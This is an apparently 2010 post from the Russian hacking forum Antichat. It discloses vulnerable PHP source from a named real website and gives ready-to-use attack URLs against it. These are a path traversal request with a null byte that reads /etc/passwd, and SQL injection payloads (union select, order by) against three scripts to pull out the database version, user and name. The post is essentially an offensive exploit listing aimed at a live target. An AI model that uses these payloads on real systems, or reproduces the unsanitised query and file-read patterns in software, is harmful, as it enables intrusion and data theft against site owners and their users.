10.01.2010, 14:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
chinmaya.org
ViewSource
downloadfile.php
PHP код:
<?
$filename = $filename;
$ext = substr(strrchr($filename, "."), 1);
$bytes = filesize("downloadfile/$filename");
header("Content-type: application/$ext");
header("Content-disposition: attachment; filename=\"$filename\"");
header("Content-length: $bytes");
@readfile("downloadfile/$filename");
?>
http://www.chinmaya.org/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00
php.ini
magic_quotes_gpc = Off
register_globals = On
SQL
news_detail.php
PHP код:
$sqlnews = "select * from newsmaster where newsid='$nid'";
http://www.chinmaya.org/news_detail.php?nid=-123'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_w s(0x203a20,version(),user(),database()),13,14,15+--+
acharya.php
PHP код:
$sqlach = "select * from acharyamaster where acharyaid='$id'";
http://www.chinmaya.org/acharya.php?id=12'+order+by+100+--+
events_detail.php
PHP код:
$sqlevents = "select * from eventsmaster where eventid='$eid'";
http://www.chinmaya.org/events_detail.php?eid=342'+order+by+100+--+
|
|
|